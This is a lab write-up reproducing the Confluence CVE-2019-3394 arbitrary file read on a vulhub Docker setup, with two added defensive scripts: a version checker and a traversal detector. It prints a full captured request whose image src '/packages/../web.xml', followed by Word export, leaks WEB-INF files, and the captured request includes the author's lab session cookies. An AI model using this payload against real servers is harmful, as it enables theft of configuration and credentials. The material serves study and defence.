Reproducing the Confluence File Read Vulnerability (CVE-2019-3394)

Disclaimer

Study hard and make progress every day.

Vulnerability description

Atlassian Confluence is a wiki system widely used by enterprises.
Confluence Server and Data Center contain a local file disclosure vulnerability in the page export feature: a remote attacker with the "Add Page" space permission can read arbitrary files under the /confluence/WEB-INF/ directory. That directory may contain configuration files used for integration with other services and may therefore leak authentication credentials, such as LDAP credentials, or other sensitive information.

Affected versions

6.1.0 <= version < 6.6.16

6.7.0 <= version < 6.13.7

6.14.0 <= version < 6.15.8
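To make the three ranges above easy to check against an inventory, here is a small version-range checker. It is an added example and is not part of the original post; the ranges are copied from the list above (lower bound inclusive, upper bound exclusive), and the version strings in the usage section are constructed test values.

```python
# Added example (not from the original post): decide whether a Confluence
# version string falls inside the affected ranges for CVE-2019-3394.
import re
from typing import Optional, Tuple

# Affected ranges from the advisory text above: (inclusive lower, exclusive upper).
# The exclusive upper bound of each range is also the first fixed release of that branch.
AFFECTED_RANGES = [
    ((6, 1, 0), (6, 6, 16)),
    ((6, 7, 0), (6, 13, 7)),
    ((6, 14, 0), (6, 15, 8)),
]


def parse_version(version: str) -> Tuple[int, int, int]:
    """Turn '6.10.2' (or '6.10', or '6.10.2-beta1') into a 3-tuple of ints.

    Only the leading dotted numeric part is used; missing components count as 0.
    """
    m = re.match(r"\s*(\d+(?:\.\d+)*)", version)
    if not m:
        raise ValueError(f"not a version string: {version!r}")
    nums = tuple(int(p) for p in m.group(1).split("."))[:3]
    return (nums + (0, 0, 0))[:3]  # type: ignore[return-value]


def is_affected(version: str) -> bool:
    """True if the version is inside any affected range."""
    v = parse_version(version)
    return any(lo <= v < hi for lo, hi in AFFECTED_RANGES)


def fixed_version_for(version: str) -> Optional[str]:
    """Return the first fixed release of the matching branch, or None if not affected."""
    v = parse_version(version)
    for lo, hi in AFFECTED_RANGES:
        if lo <= v < hi:
            return ".".join(str(n) for n in hi)
    return None


if __name__ == "__main__":
    # Constructed sample inventory, not real hosts.
    for host, ver in [("wiki-a", "6.10.2"), ("wiki-b", "6.6.16"), ("wiki-c", "6.15.8")]:
        print(host, ver, "affected" if is_affected(ver) else "ok", fixed_version_for(ver))
```

The 6.10.2 environment used in this write-up is reported as affected with 6.13.7 as the first fixed release of its branch; 6.6.16, 6.13.7 and 6.15.8 themselves are reported as not affected.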

Reproduction steps

Version 6.10.2 is used here.

Use vulhub's CVE-2019-3396 environment (setting it up does take some effort, so don't give up easily; the installation process here is the same as for 3396).

cd /app/vulhub-master/confluence/CVE-2019-3396

Start it with docker:

docker-compose up -d

For the setup process, see:

https://blog.csdn.net/nex1less/article/details/102783999

https://www.cnblogs.com/Zh1z3ven/p/13755525.html

For the environment, I recommend giving the VM at least 4 GB of RAM. My docker VM had 2 GB and crashed outright; I temporarily raised it to 8 GB (I will never be stingy again), and then had to delete and re-pull the image.

After the environment starts, visit http://your-ip:8090 and you will be taken to the setup wizard. Choose "Trial installation"; you will then be asked for a license key. Click "Get an evaluation license" and apply for a Confluence Server evaluation license on Atlassian's official site. This step is a bit tedious, so be patient; you need to enter an email address and register (do not choose Data Center or Addons):

http://192.168.239.129:8090

It is best to note down the Server ID on the installation page first:

BLQS-RN83-KEI3-FET1

After obtaining the license, click Next.

This is the point where I had to run docker-compose up/down repeatedly for a long time before reaching the user management configuration.

Users behind the Great Firewall: skip whatever steps you need to skip.

Click Create to open the page-creation view, fill in the title and body, then click Publish in the lower right and capture the request.

Here is my request (it is not easy to catch; in Burp, just search for the keyword as you forward each request):

PUT /rest/api/content/65617?status=draft HTTP/1.1
Host: 192.168.239.129:8090
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.239.129:8090/pages/resumedraft.action?draftId=65617&draftShareId=4b88b998-1600-40c9-b35c-e47e9f674494
Content-Length: 369
Cookie: LxuP_2132_saltkey=OMF1tm3T; LxuP_2132_lastvisit=1606894588; LxuP_2132_ulastactivity=2f71gpPVBSW4xfz43JuiDfM%2F0mpBLLmtHNRn8C61FS4kFgZxTJ8n; LxuP_2132_lastcheckfeed=1%7C1606898453; LxuP_2132_nofavfid=1; qMBc_2132_sid=I5b1w1; qMBc_2132_saltkey=xAQhmQRQ; qMBc_2132_lastvisit=1606973661; qMBc_2132_lastact=1606977478%09misc.php%09patch; qMBc_2132_seccode=3.8a8437292a0e156a9d; qMBc_2132_ulastactivity=631euTfLsH2SDcarY2CPsrtGmLOXGlUTjkv4obaoQSepXdhgy%2FGV; qMBc_2132_auth=d792eKiQ1yQS9rIoiBOJa0b%2Fl00zf%2FhOfWYYIVhN3wo%2FZ0YV%2F5C4tp3ARdfVKedcqKN3UpF8iCP0fafvPC7P; qMBc_2132_lastcheckfeed=2%7C1606977275; qMBc_2132_lip=Manual+Acting%2C1606977251; qMBc_2132_nofavfid=1; dH5g_2132_saltkey=mIQcCC5I; dH5g_2132_lastvisit=1606974982; dH5g_2132_sid=VUkTKd; dH5g_2132_lastact=1606978855%09home.php%09spacecp; dH5g_2132_seccode=2.c3d57b048c88d7cffb; dH5g_2132_ulastactivity=e35aNpy3yHC6zAiJV0YMLXLqujGMC5T7dTcg3FEpx4Z5H045HtB7; dH5g_2132_auth=488bFp2bXZh3XFx5QvQ27pop6p6FOFc0UWqVC%2B9ZL3NfnF6LvmjrAnEPp0STuBqLt0Y6Qy5dlXCiDLRx50j2; dH5g_2132_nofavfid=1; wxTp_2132_sid=ROOfYq; wxTp_2132_saltkey=WE8r8h8K; wxTp_2132_lastvisit=1606976300; wxTp_2132_lastact=1606980407%09misc.php%09patch; wxTp_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; wxTp_2132_seccode=7.afaaaba06ac830f87b; wxTp_2132_ulastactivity=a1876qkUep0STAD5x6RGuzSW4OfiO1Xr1STrKzcpTYkR4jRmZDut; wxTp_2132_auth=1f91XJ4rWdWCYb%2BlhT8DUPCbp0A0u1XXn1CwCdHY2GJOYPrT4vnE2tuD8t2ddGpp05JwPni8cby%2FnCEoh5H5; wxTp_2132_lastcheckfeed=1%7C1606980025; wxTp_2132_lip=192.168.239.158%2C1606979545; wxTp_2132_nofavfid=1; oEc_sid=vVVHvY; oEc_cookietime=2592000; oEc_auth=4a95ARoccwG5crxEL5hybGcp7IZoXNQMyju4wnvsJB3pZxJdh43N6udrFX8INT7g%2BXQR%2BEQ6zzHbUSI87IzNgQ; oEc_visitedfid=2; smile=1D1; redirect=1; JSESSIONID=58A795CE4E26BC6B82A91D2DCAD4AC81; seraph.confluence=491521%3Adb2261de7e3dd0b193d49ab9265b2abdb8b5e91e
DNT: 1
Connection: close

{"status":"current","title":"test","space":{"key":"ADMIN"},"body":{"editor":{"value":"<p><img class=\"confluence-embedded-image\" src=\"/packages/../web.xml\" /></p>","representation":"editor","content":{"id":"65617"}}},"id":"65617","type":"page","version":{"number":1,"minorEdit":true,"syncRev":"0.VwIMZFtQ5GXSeMJG6YTOkQ.0"},"ancestors":[{"id":"65584","type":"page"}]}

This step is fairly critical. How to put it: modifying the request while forwarding it has a higher chance of success, so it is best not to do it in Repeater. The way I succeeded this time was to first insert an image from the web, then change the image URL to

/packages/../web.xml

After the image is inserted successfully, remember that the final attack is always done by capturing and modifying the request sent by the Update button (that is, the screenshot above and the code above). After clicking Update, find the correct POST endpoint and replace the entire POST request body with the following. I made the change while forwarding; with Repeater, although it returned 200, the file read failed:

{"status":"current","title":"test","space":{"key":"ADMIN"},"body":{"editor":{"value":"<p><img class=\"confluence-embedded-image\" src=\"/packages/../web.xml\" /></p>","representation":"editor","content":{"id":"65617"}}},"id":"65617","type":"page","version":{"number":1,"minorEdit":true,"syncRev":"0.VwIMZFtQ5GXSeMJG6YTOkQ.0"},"ancestors":[{"id":"65584","type":"page"}]}

Once it succeeds, you can see that the src has been inserted into the HTML. Doesn't this look a lot like XSS?

After clicking the Update button in the lower right, press F5 to refresh; you will see a three-dot menu in the upper right. Click Export to Word, then capture the request so the file can be viewed conveniently.
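From the defender's side, the interesting property of the request above is that the page body delivered through the content REST API carries an image src with a "../" segment. The following script, an added example that is not part of the original post, shows how to flag such content updates. The only input format it assumes is the JSON body of the captured PUT /rest/api/content/<id> request shown above (body.editor.value or body.storage.value holding editor HTML); the sample bodies at the bottom are constructed to mirror that capture.

```python
# Added example (not from the original post): flag Confluence content updates
# whose editor HTML embeds an image with a path-traversal src, the pattern
# used by CVE-2019-3394. Input: JSON body of PUT /rest/api/content/<id>.
import json
from html.parser import HTMLParser
from typing import List
from urllib.parse import unquote


class _ImgSrcCollector(HTMLParser):
    """Collect every <img src=...> value in a fragment of HTML."""

    def __init__(self) -> None:
        super().__init__()
        self.srcs: List[str] = []

    # HTMLParser routes self-closing <img .../> through handle_starttag as well.
    def handle_starttag(self, tag, attrs):
        if tag.lower() == "img":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value)


def extract_img_srcs(html: str) -> List[str]:
    parser = _ImgSrcCollector()
    parser.feed(html)
    return parser.srcs


def is_traversal(src: str) -> bool:
    """True if the path part of src contains a '..' segment.

    The value is URL-decoded twice so that %2e%2e and %252e%252e are caught,
    and backslashes are folded to slashes before splitting into segments.
    """
    path = src.split("?", 1)[0].split("#", 1)[0]
    path = unquote(unquote(path)).replace("\\", "/")
    return ".." in path.split("/")


def suspicious_srcs(body: str) -> List[str]:
    """Return the img src values in a content-update body that look like traversal."""
    doc = json.loads(body)
    found: List[str] = []
    # Confluence bodies are keyed by representation (editor, storage, ...);
    # each one carries the markup under "value".
    for representation in doc.get("body", {}).values():
        if isinstance(representation, dict):
            html = representation.get("value", "")
            found.extend(s for s in extract_img_srcs(html) if is_traversal(s))
    return found


def _make_body(src: str) -> str:
    """Constructed helper: build a content-update body shaped like the capture above."""
    return json.dumps({
        "status": "current", "title": "test", "space": {"key": "ADMIN"},
        "body": {"editor": {
            "value": f'<p><img class="confluence-embedded-image" src="{src}" /></p>',
            "representation": "editor", "content": {"id": "65617"}}},
        "id": "65617", "type": "page",
        "version": {"number": 1, "minorEdit": True},
    })


# Constructed samples: the traversal body mirrors the captured request; the
# benign one points at an ordinary attachment path.
SAMPLE_TRAVERSAL = _make_body("/packages/../web.xml")
SAMPLE_BENIGN = _make_body("/download/attachments/65617/pic.png")

if __name__ == "__main__":
    for label, body in [("traversal", SAMPLE_TRAVERSAL), ("benign", SAMPLE_BENIGN)]:
        print(label, suspicious_srcs(body))
```

This is a content-level check, so it can run over a reverse-proxy or WAF request log that records JSON bodies, or over the page history stored in Confluence itself after the fact; either way it surfaces the exact body that the export step later turns into a file read.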

Shut down the environment (do this after every use):

docker-compose down

Common docker-compose commands

Build and start the image (after entering a specific vulhub directory):

docker-compose build
docker-compose up -d

List containers (the first column is the container ID):

docker ps -a

Enter a specific container (using the ID from the previous command):

docker exec -it ID /bin/bash

Shut down the environment (do this after every use):

docker-compose down